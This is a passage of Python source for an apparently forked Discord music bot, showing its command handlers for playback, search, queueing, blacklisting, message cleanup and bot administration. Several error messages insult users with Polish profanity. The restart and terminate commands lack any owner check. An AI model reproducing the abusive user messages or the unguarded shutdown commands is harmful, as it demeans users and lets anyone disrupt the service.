await self.update_now_playing_status()
# maybe option to leave the ownerid blank and generate a random command for the owner to use
# wait_for_message is pretty neato
await self._join_startup_channels(autojoin_channels, autosummon=self.config.auto_summon)
# t-t-th-th-that's all folks!
async def cmd_help(self, command=None):
"""
Usage:
{command_prefix}help [command]
Prints a help message.
If a command is specified, it prints a help message for that command.
Otherwise, it lists the available commands.
"""
if command:
cmd = getattr(self, 'cmd_' + command, None)
if cmd and not hasattr(cmd, 'dev_cmd'):
return Response(
"```\n{}```".format(
dedent(cmd.__doc__)
).format(command_prefix=self.config.command_prefix),
delete_after=60
)
else:
return Response("Nie ma takiej komendy", delete_after=10)
else:
helpmsg = "**Dostępne Komendy**\n```"
commands = []
for att in dir(self):
if att.startswith('cmd_') and att != 'cmd_help' and not hasattr(getattr(self, att), 'dev_cmd'):
command_name = att.replace('cmd_', '').lower()
commands.append("{}{}".format(self.config.command_prefix, command_name))
helpmsg += ", ".join(commands)
helpmsg += "```\n<>"
helpmsg += "Możesz też uzyc `{}help x` aby dowiedzieć paru rzeczy się o poszczególnych komendach.".format(self.config.command_prefix)
return Response(helpmsg, reply=True, delete_after=60)
async def cmd_blacklist(self, message, user_mentions, option, something):
"""
Usage:
{command_prefix}blacklist [ + | - | add | remove ] @UserName [@UserName2 ...]
Add or remove users to the blacklist.
Blacklisted users are forbidden from using bot commands.
"""
if not user_mentions:
raise exceptions.CommandError("No users listed.", expire_in=20)
if option not in ['+', '-', 'add', 'remove']:
raise exceptions.CommandError(
'Invalid option "%s" specified, use +, -, add, or remove' % option, expire_in=20
)
for user in user_mentions.copy():
if user.id == self.config.owner_id:
print("[Commands:Blacklist] The owner cannot be blacklisted.")
user_mentions.remove(user)
old_len = len(self.blacklist)
if option in ['+', 'add']:
self.blacklist.update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
'%s users have been added to the blacklist' % (len(self.blacklist) - old_len),
reply=True, delete_after=10
)
else:
if self.blacklist.isdisjoint(user.id for user in user_mentions):
return Response('none of those users are in the blacklist.', reply=True, delete_after=10)
else:
self.blacklist.difference_update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
'%s users have been removed from the blacklist' % (old_len - len(self.blacklist)),
reply=True, delete_after=10
)
async def cmd_id(self, author, user_mentions):
"""
Usage:
{command_prefix}id [@user]
Tells the user their id or the id of another user.
"""
if not user_mentions:
return Response('your id is `%s`' % author.id, reply=True, delete_after=35)
else:
usr = user_mentions[0]
return Response("%s's id is `%s`" % (usr.name, usr.id), reply=True, delete_after=35)
async def cmd_save(self, player):
"""
Usage:
{command_prefix}save
Saves the current song to the autoplaylist.
"""
if player.current_entry and not isinstance(player.current_entry, StreamPlaylistEntry):
url = player.current_entry.url
if url not in self.autoplaylist:
self.autoplaylist.append(url)
write_file(self.config.auto_playlist_file, self.autoplaylist)
log.debug("Appended {} to autoplaylist".format(url))
return Response('\N{THUMBS UP SIGN}')
else:
raise exceptions.CommandError('Już jest w autoplayliscie.')
else:
raise exceptions.CommandError('There is no valid song playing.')
@owner_only
async def cmd_wejdz(self, message, server_link=None):
"""
Usage:
{command_prefix}joinserver invite_link
Asks the bot to join a server. Note: Bot accounts cannot use invite links.
"""
if self.user.bot:
url = await self.generate_invite_link()
return Response(
"Kliknij by dodać mnie na serwer.: \n{}".format(url),
reply=True, delete_after=30
)
try:
if server_link:
await self.accept_invite(server_link)
return Response("\N{THUMBS UP SIGN}")
except:
raise exceptions.CommandError('Invalid URL provided:\n{}\n'.format(server_link), expire_in=30)
async def cmd_play(self, player, channel, author, permissions, leftover_args, song_url):
"""
Usage:
{command_prefix}play song_link
{command_prefix}play text to search for
Adds the song to the playlist. If a link is not provided, the first
result from a youtube search is added to the queue.
"""
song_url = song_url.strip('<>')
await self.send_typing(channel)
if leftover_args:
song_url = ' '.join([song_url, *leftover_args])
linksRegex = '((http(s)*:[/][/]|www.)([a-z]|[A-Z]|[0-9]|[/.]|[~])*)'
pattern = re.compile(linksRegex)
matchUrl = pattern.match(song_url)
if matchUrl is None:
song_url = song_url.replace('/', '%2F')
async with self.aiolocks[_func_() + ':' + author.id]:
if permissions.max_songs and player.playlist.count_for_user(author) >= permissions.max_songs:
raise exceptions.PermissionsError(
"Osiagnales limit requestow debilu zajebany (%s)" % permissions.max_songs, expire_in=30
)
try:
info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
except Exception as e:
raise exceptions.CommandError(e, expire_in=30)
if not info:
raise exceptions.CommandError(
"Nie umiem grac muzyki smuteg. Try using the {}stream command.".format(self.config.command_prefix),
expire_in=30
)
# abstract the search handling away from the user
# our ytdl options allow us to use search strings as input urls
if info.get('url', '').startswith('ytsearch'):
# print("[Command:play] Searching for \"%s\"" % song_url)
info = await self.downloader.extract_info(
player.playlist.loop,
song_url,
download=False,
process=True, # ASYNC LAMBDAS WHEN
on_error=lambda e: asyncio.ensure_future(
self.safe_send_message(channel, "```\n%s\n```" % e, expire_in=120), loop=self.loop),
retry_on_error=True
)
if not info:
raise exceptions.CommandError(
"No cusz,zjebalo sie. "
"Restartuj bota kurwo.", expire_in=30
)
if not all(info.get('entries', [])):
# empty list, no data
log.debug("Got empty list, no data")
return
# TODO: handle 'webpage_url' being 'ytsearch:...' or extractor type
song_url = info['entries'][0]['webpage_url']
info = await self.downloader.extract_info(player.playlist.loop, song_url, download=False, process=False)
# Now I could just do: return await self.cmd_play(player, channel, author, song_url)
# But this is probably fine
# TODO: Possibly add another check here to see about things like the bandcamp issue
# TODO: Where ytdl gets the generic extractor version with no processing, but finds two different urls
if 'entries' in info:
# I have to do exe extra checks anyways because you can request an arbitrary number of search results
if not permissions.allow_playlists and ':search' in info['extractor'] and len(info['entries']) > 1:
raise exceptions.PermissionsError("You are not allowed to request playlists", expire_in=30)
# The only reason we would use this over `len(info['entries'])` is if we add `if _` to this one
num_songs = sum(1 for _ in info['entries'])
if permissions.max_playlist_length and num_songs > permissions.max_playlist_length:
raise exceptions.PermissionsError(
"Playlist has too many entries (%s > %s)" % (num_songs, permissions.max_playlist_length),
expire_in=30
)
# This is a little bit weird when it says (x + 0 > y), I might add the other check back in
if permissions.max_songs and player.playlist.count_for_user(author) + num_songs > permissions.max_songs:
raise exceptions.PermissionsError(
"Playlist entries + your already queued songs reached limit (%s + %s > %s)" % (
num_songs, player.playlist.count_for_user(author), permissions.max_songs),
expire_in=30
)
if info['extractor'].lower() in ['youtube:playlist', 'soundcloud:set', 'bandcamp:album']:
try:
return await self._cmd_play_playlist_async(player, channel, author, permissions, song_url, info['extractor'])
except exceptions.CommandError:
raise
except Exception as e:
log.error("Error queuing playlist", exc_info=True)
raise exceptions.CommandError("Error queuing playlist:\n%s" % e, expire_in=30)
t0 = time.time()
# My test was 1.2 seconds per song, but we maybe should fudge it a bit, unless we can
# monitor it and edit the message with the estimated time, but that's some ADVANCED SHIT
# I don't think we can hook into it anyways, so this will have to do.
# It would probably be a thread to check a few playlists and get the speed from that
# Different playlists might download at different speeds though
wait_per_song = 1.2
procmesg = await self.safe_send_message(
channel,
'Gathering playlist information for {} songs{}'.format(
num_songs,
', ETA: {} seconds'.format(fixg(
num_songs * wait_per_song)) if num_songs >= 10 else '.'))
# We don't have a pretty way of doing this yet. We need either a loop
# that sends these every 10 seconds or a nice context manager.
await self.send_typing(channel)
# TODO: I can create an event emitter object instead, add event functions, and every play list might be asyncified
# Also have a "verify_entry" hook with the entry as an arg and returns the entry if its ok
entry_list, position = await player.playlist.import_from(song_url, channel=channel, author=author)
tnow = time.time()
ttime = tnow - t0
listlen = len(entry_list)
drop_count = 0
if permissions.max_song_length:
for e in entry_list.copy():
if e.duration > permissions.max_song_length:
player.playlist.entries.remove(e)
entry_list.remove(e)
drop_count += 1
# Im pretty sure there's no situation where this would ever break
# Unless the first entry starts being played, which would make this a race condition
if drop_count:
print("Dropped %s songs" % drop_count)
log.info("Processed {} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
listlen,
fixg(ttime),
ttime / listlen if listlen else 0,
ttime / listlen - wait_per_song if listlen - wait_per_song else 0,
fixg(wait_per_song * num_songs))
)
await self.safe_delete_message(procmesg)
if not listlen - drop_count:
raise exceptions.CommandError(
"No songs were added, all songs were over max duration (%ss)" % permissions.max_song_length,
expire_in=30
)
reply_text = "Enqueued **%s** songs to be played. Position in queue: %s"
btext = str(listlen - drop_count)
else:
if permissions.max_song_length and info.get('duration', 0) > permissions.max_song_length:
raise exceptions.PermissionsError(
"Song duration exceeds limit (%s > %s)" % (info['duration'], permissions.max_song_length),
expire_in=30
)
try:
entry, position = await player.playlist.add_entry(song_url, channel=channel, author=author)
except exceptions.WrongEntryTypeError as e:
if e.use_url == song_url:
log.warning("Determined incorrect entry type, but suggested url is the same. Help.")
log.debug("Assumed url \"%s\" was a single entry, was actually a playlist" % song_url)
log.debug("Using \"%s\" instead" % e.use_url)
return await self.cmd_play(player, channel, author, permissions, leftover_args, e.use_url)
reply_text = "Enqueued **%s** to be played. Position in queue: %s"
btext = entry.title
if position == 1 and player.is_stopped:
position = 'Up next!'
reply_text %= (btext, position)
else:
try:
time_until = await player.playlist.estimate_time_until(position, player)
reply_text += ' - estimated time until playing: %s'
except:
traceback.print_exc()
time_until = ''
reply_text %= (btext, position, ftimedelta(time_until))
return Response(reply_text, delete_after=30)
async def _cmd_play_playlist_async(self, player, channel, author, permissions, playlist_url, extractor_type):
"""
Secret handler to use the async wizardry to make playlist queuing non-"blocking"
"""
await self.send_typing(channel)
info = await self.downloader.extract_info(player.playlist.loop, playlist_url, download=False, process=False)
if not info:
raise exceptions.CommandError("That playlist cannot be played.")
num_songs = sum(1 for _ in info['entries'])
t0 = time.time()
busymsg = await self.safe_send_message(
channel, "Processing %s songs..." % num_songs) # TODO: From playlist_title
await self.send_typing(channel)
entries_added = 0
if extractor_type == 'youtube:playlist':
try:
entries_added = await player.playlist.async_process_youtube_playlist(
playlist_url, channel=channel, author=author)
# TODO: Add hook to be called after each song
# TODO: Add permissions
except Exception:
log.error("Error processing playlist", exc_info=True)
raise exceptions.CommandError('Error handling playlist %s queuing.' % playlist_url, expire_in=30)
elif extractor_type.lower() in ['soundcloud:set', 'bandcamp:album']:
try:
entries_added = await player.playlist.async_process_sc_bc_playlist(
playlist_url, channel=channel, author=author)
# TODO: Add hook to be called after each song
# TODO: Add permissions
except Exception:
log.error("Error processing playlist", exc_info=True)
raise exceptions.CommandError('Error handling playlist %s queuing.' % playlist_url, expire_in=30)
songs_processed = len(entries_added)
drop_count = 0
skipped = False
if permissions.max_song_length:
for e in entries_added.copy():
if e.duration > permissions.max_song_length:
try:
player.playlist.entries.remove(e)
entries_added.remove(e)
drop_count += 1
except:
pass
if drop_count:
log.debug("Dropped %s songs" % drop_count)
if player.current_entry and player.current_entry.duration > permissions.max_song_length:
await self.safe_delete_message(self.server_specific_data[channel.server]['last_np_msg'])
self.server_specific_data[channel.server]['last_np_msg'] = None
skipped = True
player.skip()
entries_added.pop()
await self.safe_delete_message(busymsg)
songs_added = len(entries_added)
tnow = time.time()
ttime = tnow - t0
wait_per_song = 1.2
# TODO: actually calculate wait per song in the process function and return that too
# This is technically inaccurate since bad songs are ignored but still take up time
log.info("Processed {}/{} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
songs_processed,
num_songs,
fixg(ttime),
ttime / num_songs if num_songs else 0,
ttime / num_songs - wait_per_song if num_songs - wait_per_song else 0,
fixg(wait_per_song * num_songs))
)
if not songs_added:
basetext = "No songs were added, all songs were over max duration (%ss)" % permissions.max_song_length
if skipped:
basetext += "\nAdditionally, the current song was skipped for being too long."
raise exceptions.CommandError(basetext, expire_in=30)
return Response("Enqueued {} songs to be played in {} seconds".format(
songs_added, fixg(ttime, 1)), delete_after=30)
async def cmd_stream(self, player, channel, author, permissions, song_url):
"""
Usage:
{command_prefix}stream song_link
Enqueue a media stream.
This could mean an actual stream like Twitch or shoutcast, or simply streaming
media without predownloading it. Note: FFmpeg is notoriously bad at handling
streams, especially on poor connections. You have been warned.
"""
song_url = song_url.strip('<>')
if permissions.max_songs and player.playlist.count_for_user(author) >= permissions.max_songs:
raise exceptions.PermissionsError(
"You have reached your enqueued song limit (%s)" % permissions.max_songs, expire_in=30
)
await self.send_typing(channel)
await player.playlist.add_stream_entry(song_url, channel=channel, author=author)
return Response(":+1:", delete_after=6)
async def cmd_szukaj(self, player, channel, author, permissions, leftover_args):
"""
Usage:
{command_prefix}szukaj [service] [number] query
Searches a service for a video and adds it to the queue.
- service: any one of the following services:
- youtube (yt) (default if unspecified)
- soundcloud (sc)
- yahoo (yh)
- number: return a number of video results and waits for user to choose one
- defaults to 3 if unspecified
- note: If your search query starts with a number,
you must put your query in quotes
- ex: {command_prefix}search 2 "I ran seagulls"
The command issuer can use reactions to indicate their response to each result.
"""
if permissions.max_songs and player.playlist.count_for_user(author) > permissions.max_songs:
raise exceptions.PermissionsError(
"Osiągnąłeś limit playlisty kutasie. (%s)" % permissions.max_songs,
expire_in=30
)
def argcheck():
if not leftover_args:
# noinspection PyUnresolvedReferences
raise exceptions.CommandError(
"Please specify a search query.\n%s" % dedent(
self.cmd_search.__doc__.format(command_prefix=self.config.command_prefix)),
expire_in=60
)
argcheck()
try:
leftover_args = shlex.split(' '.join(leftover_args))
except ValueError:
raise exceptions.CommandError("Please quote your search query properly.", expire_in=30)
service = 'youtube'
items_requested = 3
max_items = 10 # this can be whatever, but since ytdl uses about 1000, a small number might be better
services = {
'youtube': 'ytsearch',
'soundcloud': 'scsearch',
'yahoo': 'yvsearch',
'yt': 'ytsearch',
'sc': 'scsearch',
'yh': 'yvsearch'
}
if leftover_args[0] in services:
service = leftover_args.pop(0)
argcheck()
if leftover_args[0].isdigit():
items_requested = int(leftover_args.pop(0))
argcheck()
if items_requested > max_items:
raise exceptions.CommandError("You cannot search for more than %s videos" % max_items)
# Look jake, if you see this and go "what the fuck are you doing"
# and have a better idea on how to do this, i'd be delighted to know.
# I don't want to just do ' '.join(leftover_args).strip("\"'")
# Because that eats both quotes if they're there
# where I only want to eat the outermost ones
if leftover_args[0][0] in '\'"':
lchar = leftover_args[0][0]
leftover_args[0] = leftover_args[0].lstrip(lchar)
leftover_args[-1] = leftover_args[-1].rstrip(lchar)
search_query = '%s%s:%s' % (services[service], items_requested, ' '.join(leftover_args))
search_msg = await self.send_message(channel, "Searching for videos...")
await self.send_typing(channel)
try:
info = await self.downloader.extract_info(player.playlist.loop, search_query, download=False, process=True)
except Exception as e:
await self.safe_edit_message(search_msg, str(e), send_if_fail=True)
return
else:
await self.safe_delete_message(search_msg)
if not info:
return Response("No videos found.", delete_after=30)
for e in info['entries']:
result_message = await self.safe_send_message(channel, "Result %s/%s: %s" % (
info['entries'].index(e) + 1, len(info['entries']), e['webpage_url']))
reactions = ['\u2705', '\U0001F6AB', '\U0001F3C1']
for r in reactions:
await self.add_reaction(result_message, r)
res = await self.wait_for_reaction(reactions, user=author, timeout=30, message=result_message)
if not res:
await self.safe_delete_message(result_message)
return
if res.reaction.emoji == '\u2705': # check
await self.safe_delete_message(result_message)
await self.cmd_play(player, channel, author, permissions, [], e['webpage_url'])
return Response("Alright, coming right up!", delete_after=30)
elif res.reaction.emoji == '\U0001F6AB': # cross
await self.safe_delete_message(result_message)
continue
else:
await self.safe_delete_message(result_message)
break
return Response("Oh well \N{SLIGHTLY FROWNING FACE}", delete_after=30)
async def cmd_np(self, player, channel, server, message):
"""
Usage:
{command_prefix}np
Displays the current song in chat.
"""
if player.current_entry:
if self.server_specific_data[server]['last_np_msg']:
await self.safe_delete_message(self.server_specific_data[server]['last_np_msg'])
self.server_specific_data[server]['last_np_msg'] = None
# TODO: Fix timedelta garbage with util function
song_progress = ftimedelta(timedelta(seconds=player.progress))
song_total = ftimedelta(timedelta(seconds=player.current_entry.duration))
streaming = isinstance(player.current_entry, StreamPlaylistEntry)
prog_str = ('`[{progress}]`' if streaming else '`[{progress}/{total}]`').format(
progress=song_progress, total=song_total
)
action_text = 'Streaming' if streaming else 'Playing'
if player.current_entry.meta.get('channel', False) and player.current_entry.meta.get('author', False):
np_text = "Now {action}: **{title}** added by **{author}** {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>".format(
action=action_text,
title=player.current_entry.title,
author=player.current_entry.meta['author'].name,
progress=prog_str,
url=player.current_entry.url
)
else:
np_text = "Now {action}: **{title}** {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>".format(
action=action_text,
title=player.current_entry.title,
progress=prog_str,
url=player.current_entry.url
)
self.server_specific_data[server]['last_np_msg'] = await self.safe_send_message(channel, np_text)
await self._manual_delete_check(message)
else:
return Response(
'There are no songs queued! Queue something with {}play.'.format(self.config.command_prefix),
delete_after=30
)
async def cmd_dj(self, channel, server, author, voice_channel):
"""
Usage:
{command_prefix}dj
Call the bot to the summoner's voice channel.
"""
if not author.voice_channel:
raise exceptions.CommandError('NIE JESTES W KANALE TEKSTOWYM!')
voice_client = self.voice_client_in(server)
if voice_client and server == author.voice_channel.server:
await voice_client.move_to(author.voice_channel)
return
# move to _verify_vc_perms?
chperms = author.voice_channel.permissions_for(server.me)
if not chperms.connect:
log.warning("Cannot join channel \"{}\", no permission.".format(author.voice_channel.name))
return Response(
"```Cannot join channel \"{}\", no permission.```".format(author.voice_channel.name),
delete_after=25
)
elif not chperms.speak:
log.warning("Will not join channel \"{}\", no permission to speak.".format(author.voice_channel.name))
return Response(
"```Will not join channel \"{}\", no permission to speak.```".format(author.voice_channel.name),
delete_after=25
)
log.info("Joining {0.server.name}/{0.name}".format(author.voice_channel))
player = await self.get_player(author.voice_channel, create=True, deserialize=self.config.persistent_queue)
if player.is_stopped:
player.play()
if self.config.auto_playlist:
await self.on_player_finished_playing(player)
async def cmd_pauza(self, player):
"""
Usage:
{command_prefix}pauza
Pauses playback of the current song.
"""
if player.is_playing:
player.pause()
else:
raise exceptions.CommandError('Player is not playing.', expire_in=30)
async def cmd_odpauzuj(self, player):
"""
Usage:
{command_prefix}odpauzuj
Resumes playback of a paused song.
"""
if player.is_paused:
player.resume()
else:
raise exceptions.CommandError('Player is not paused.', expire_in=30)
async def cmd_mieszaj(self, channel, player):
"""
Usage:
{command_prefix}mieszaj
Shuffles the playlist.
"""
player.playlist.shuffle()
cards = ['\N{BLACK SPADE SUIT}', '\N{BLACK CLUB SUIT}', '\N{BLACK HEART SUIT}', '\N{BLACK DIAMOND SUIT}']
random.shuffle(cards)
hand = await self.send_message(channel, ' '.join(cards))
await asyncio.sleep(0.6)
for x in range(4):
random.shuffle(cards)
await self.safe_edit_message(hand, ' '.join(cards))
await asyncio.sleep(0.6)
await self.safe_delete_message(hand, quiet=True)
return Response("\N{OK HAND SIGN}", delete_after=15)
async def cmd_wyjeb(self, player, author):
"""
Usage:
{command_prefix}wyjeb
Clears the playlist.
"""
player.playlist.clear()
return Response('\N{PUT LITTER IN ITS PLACE SYMBOL}', delete_after=20)
async def cmd_skip(self, player, channel, author, message, permissions, voice_channel):
"""
Usage:
{command_prefix}skip
Skips the current song when enough votes are cast, or by the bot owner.
"""
if player.is_stopped:
raise exceptions.CommandError("Can't skip! The player is not playing!", expire_in=20)
if not player.current_entry:
if player.playlist.peek():
if player.playlist.peek()._is_downloading:
return Response("The next song (%s) is downloading, please wait." % player.playlist.peek().title)
elif player.playlist.peek().is_downloaded:
print("The next song will be played shortly. Please wait.")
else:
print("Something odd is happening. "
"You might want to restart the bot if it doesn't start working.")
else:
print("Something strange is happening. "
"You might want to restart the bot if it doesn't start working.")
if author.id == self.config.owner_id \
or permissions.instaskip \
or author == player.current_entry.meta.get('author', None):
player.skip() # check autopause stuff here
await self._manual_delete_check(message)
return
# TODO: ignore person if they're deaf or take them out of the list or something?
# Currently is recounted if they vote, deafen, then vote
num_voice = sum(1 for m in voice_channel.voice_members if not (
m.deaf or m.self_deaf or m.id in [self.config.owner_id, self.user.id]))
num_skips = player.skip_state.add_skipper(author.id, message)
skips_remaining = min(
self.config.skips_required,
math.ceil(self.config.skip_ratio_required / (1 / num_voice)) # Number of skips from config ratio
) - num_skips
if skips_remaining <= 0:
player.skip() # check autopause stuff here
return Response(
'your skip for **{}** was acknowledged.'
'\nThe vote to skip has been passed.{}'.format(
player.current_entry.title,
' Next song coming up!' if player.playlist.peek() else ''
),
reply=True,
delete_after=20
)
else:
# TODO: When a song gets skipped, delete the old x needed to skip messages
return Response(
'your skip for **{}** was acknowledged.'
'\n**{}** more {} required to vote to skip this song.'.format(
player.current_entry.title,
skips_remaining,
'person is' if skips_remaining == 1 else 'people are'
),
reply=True,
delete_after=20
)
async def cmd_volume(self, message, player, new_volume=None):
"""
Usage:
{command_prefix}volume (+/-)[volume]
Sets the playback volume. Accepted values are from 1 to 100.
Putting + or - before the volume will make the volume change relative to the current volume.
"""
if not new_volume:
return Response('Current volume: `%s%%`' % int(player.volume * 100), reply=True, delete_after=20)
relative = False
if new_volume[0] in '+-':
relative = True
try:
new_volume = int(new_volume)
except ValueError:
raise exceptions.CommandError('{} is not a valid number'.format(new_volume), expire_in=20)
vol_change = None
if relative:
vol_change = new_volume
new_volume += (player.volume * 100)
old_volume = int(player.volume * 100)
if 0 < new_volume <= 100:
player.volume = new_volume / 100.0
return Response('updated volume from %d to %d' % (old_volume, new_volume), reply=True, delete_after=20)
else:
if relative:
raise exceptions.CommandError(
'Unreasonable volume change provided: {}{:+} -> {}%. Provide a change between {} and {:+}.'.format(
old_volume, vol_change, old_volume + vol_change, 1 - old_volume, 100 - old_volume), expire_in=20)
else:
raise exceptions.CommandError(
'Unreasonable volume provided: {}%. Provide a value between 1 and 100.'.format(new_volume), expire_in=20)
async def cmd_kolejka(self, channel, player):
"""
Usage:
{command_prefix}kolejka
Prints the current song queue.
"""
lines = []
unlisted = 0
andmoretext = '* ... and %s more*' % ('x' * len(player.playlist.entries))
if player.current_entry:
# TODO: Fix timedelta garbage with util function
song_progress = ftimedelta(timedelta(seconds=player.progress))
song_total = ftimedelta(timedelta(seconds=player.current_entry.duration))
prog_str = '`[%s/%s]`' % (song_progress, song_total)
if player.current_entry.meta.get('channel', False) and player.current_entry.meta.get('author', False):
lines.append("Currently Playing: **%s** added by **%s** %s\n" % (
player.current_entry.title, player.current_entry.meta['author'].name, prog_str))
else:
lines.append("Now Playing: **%s** %s\n" % (player.current_entry.title, prog_str))
for i, item in enumerate(player.playlist, 1):
if item.meta.get('channel', False) and item.meta.get('author', False):
nextline = '`{}.` **{}** added by **{}**'.format(i, item.title, item.meta['author'].name).strip()
else:
nextline = '`{}.` **{}**'.format(i, item.title).strip()
currentlinesum = sum(len(x) + 1 for x in lines) # +1 is for newline char
if currentlinesum + len(nextline) + len(andmoretext) > DISCORD_MSG_CHAR_LIMIT:
if currentlinesum + len(andmoretext):
unlisted += 1
continue
lines.append(nextline)
if unlisted:
lines.append('\n*... and %s more*' % unlisted)
if not lines:
lines.append(
'There are no songs queued! Queue something with {}play.'.format(self.config.command_prefix))
message = '\n'.join(lines)
return Response(message, delete_after=30)
async def cmd_clean(self, message, channel, server, author, search_range=50):
"""
Usage:
{command_prefix}clean [range]
Removes up to [range] messages the bot has posted in chat. Default: 50, Max: 1000
"""
try:
float(search_range) # lazy check
search_range = min(int(search_range), 1000)
except:
return Response("enter a number. NUMBER. That means digits. `15`. Etc.", reply=True, delete_after=8)
await self.safe_delete_message(message, quiet=True)
def is_possible_command_invoke(entry):
valid_call = any(
entry.content.startswith(prefix) for prefix in [self.config.command_prefix]) # can be expanded
return valid_call and not entry.content[1:2].isspace()
delete_invokes = True
delete_all = channel.permissions_for(author).manage_messages or self.config.owner_id == author.id
def check(message):
if is_possible_command_invoke(message) and delete_invokes:
return delete_all or message.author == author
return message.author == self.user
if self.user.bot:
if channel.permissions_for(server.me).manage_messages:
deleted = await self.purge_from(channel, check=check, limit=search_range, before=message)
return Response('Cleaned up {} message{}.'.format(len(deleted), 's' * bool(deleted)), delete_after=15)
deleted = 0
async for entry in self.logs_from(channel, search_range, before=message):
if entry == self.server_specific_data[channel.server]['last_np_msg']:
continue
if entry.author == self.user:
await self.safe_delete_message(entry)
deleted += 1
await asyncio.sleep(0.21)
if is_possible_command_invoke(entry) and delete_invokes:
if delete_all or entry.author == author:
try:
await self.delete_message(entry)
await asyncio.sleep(0.21)
deleted += 1
except discord.Forbidden:
delete_invokes = False
except discord.HTTPException:
pass
return Response('Cleaned up {} message{}.'.format(deleted, 's' * bool(deleted)), delete_after=6)
async def cmd_pldump(self, channel, song_url):
"""
Usage:
{command_prefix}pldump url
Dumps the individual urls of a playlist
"""
try:
info = await self.downloader.extract_info(self.loop, song_url.strip('<>'), download=False, process=False)
except Exception as e:
raise exceptions.CommandError("Could not extract info from input url\n%s\n" % e, expire_in=25)
if not info:
raise exceptions.CommandError("Could not extract info from input url, no data.", expire_in=25)
if not info.get('entries', None):
# TODO: Retarded playlist checking
# set(url, webpageurl).difference(set(url))
if info.get('url', None) != info.get('webpage_url', info.get('url', None)):
raise exceptions.CommandError("This does not seem to be a playlist.", expire_in=25)
else:
return await self.cmd_pldump(channel, info.get(''))
linegens = defaultdict(lambda: None, **{
"youtube": lambda d: 'https://www.youtube.com/watch?v=%s' % d['id'],
"soundcloud": lambda d: d['url'],
"bandcamp": lambda d: d['url']
})
exfunc = linegens[info['extractor'].split(':')[0]]
if not exfunc:
raise exceptions.CommandError("Could not extract info from input url, unsupported playlist type.", expire_in=25)
with BytesIO() as fcontent:
for item in info['entries']:
fcontent.write(exfunc(item).encode('utf8') + b'\n')
fcontent.seek(0)
await self.send_file(channel, fcontent, filename='playlist.txt', content="Here's the url dump for <%s>" % song_url)
return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
async def cmd_listids(self, server, author, leftover_args, cat='all'):
"""
Usage:
{command_prefix}listids [categories]
Lists the ids for various things. Categories are:
all, users, roles, channels
"""
cats = ['channels', 'roles', 'users']
if cat not in cats and cat != 'all':
return Response(
"Valid categories: " + ' '.join(['`%s`' % c for c in cats]),
reply=True,
delete_after=25
)
if cat == 'all':
requested_cats = cats
else:
requested_cats = [cat] + [c.strip(',') for c in leftover_args]
data = ['Your ID: %s' % author.id]
for cur_cat in requested_cats:
rawudata = None
if cur_cat == 'users':
data.append("\nUser IDs:")
rawudata = ['%s #%s: %s' % (m.name, m.discriminator, m.id) for m in server.members]
elif cur_cat == 'roles':
data.append("\nRole IDs:")
rawudata = ['%s: %s' % (r.name, r.id) for r in server.roles]
elif cur_cat == 'channels':
data.append("\nText Channel IDs:")
tchans = [c for c in server.channels if c.type == discord.ChannelType.text]
rawudata = ['%s: %s' % (c.name, c.id) for c in tchans]
rawudata.append("\nVoice Channel IDs:")
vchans = [c for c in server.channels if c.type == discord.ChannelType.voice]
rawudata.extend('%s: %s' % (c.name, c.id) for c in vchans)
if rawudata:
data.extend(rawudata)
with BytesIO() as sdata:
sdata.writelines(d.encode('utf8') + b'\n' for d in data)
sdata.seek(0)
# TODO: Fix naming (Discord20API-ids.txt)
await self.send_file(author, sdata, filename='%s-ids-%s.txt' % (server.name.replace(' ', '_'), cat))
return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
async def cmd_perms(self, author, channel, server, permissions):
"""
Usage:
{command_prefix}perms
Sends the user a list of their permissions.
"""
lines = ['Command permissions in %s\n' % server.name, '```', '```']
for perm in permissions.__dict__:
if perm in ['user_list'] or permissions.__dict__[perm] == set():
continue
lines.insert(len(lines) - 1, "%s: %s" % (perm, permissions.__dict__[perm]))
await self.send_message(author, '\n'.join(lines))
return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
@owner_only
async def cmd_setname(self, leftover_args, name):
"""
Usage:
{command_prefix}setname name
Changes the bot's username.
Note: This operation is limited by discord to twice per hour.
"""
name = ' '.join([name, *leftover_args])
try:
await self.edit_profile(username=name)
except discord.HTTPException:
raise exceptions.CommandError(
"Failed to change name. Did you change names too many times? "
"Remember name changes are limited to twice per hour.")
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response("\N{OK HAND SIGN}", delete_after=20)
async def cmd_setnick(self, server, channel, leftover_args, nick):
"""
Usage:
{command_prefix}setnick nick
Changes the bot's nickname.
"""
if not channel.permissions_for(server.me).change_nickname:
raise exceptions.CommandError("Unable to change nickname: no permission.")
nick = ' '.join([nick, *leftover_args])
try:
await self.change_nickname(server.me, nick)
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response("\N{OK HAND SIGN}", delete_after=20)
@owner_only
async def cmd_setavatar(self, message, url=None):
"""
Usage:
{command_prefix}setavatar [url]
Changes the bot's avatar.
Attaching a file and leaving the url parameter blank also works.
"""
if message.attachments:
thing = message.attachments[0]['url']
elif url:
thing = url.strip('<>')
else:
raise exceptions.CommandError("You must provide a URL or attach a file.", expire_in=20)
try:
with aiohttp.Timeout(10):
async with self.aiosession.get(thing) as res:
await self.edit_profile(avatar=await res.read())
except Exception as e:
raise exceptions.CommandError("Unable to change avatar: {}".format(e), expire_in=20)
return Response("\N{OK HAND SIGN}", delete_after=20)
async def cmd_disconnect(self, server):
await self.disconnect_voice_client(server)
return Response("\N{DASH SYMBOL}", delete_after=20)
async def cmd_restart(self, channel):
await self.safe_send_message(channel, "\N{WAVING HAND SIGN}")
await self.disconnect_all_voice_clients()
raise exceptions.RestartSignal()
async def cmd_spierdalaj(self, channel):
await self.safe_send_message(channel, "\N{WAVING HAND SIGN}")
await self.disconnect_all_voice_clients()
raise exceptions.TerminateSignal()
@dev_only
async def cmd_breakpoint(self, message):
log.critical("Activating debug breakpoint")
return
@dev_only
async def cmd_objgraph(self, channel, func='most_common_types()'):
import objgraph
await self.send_typing(channel)
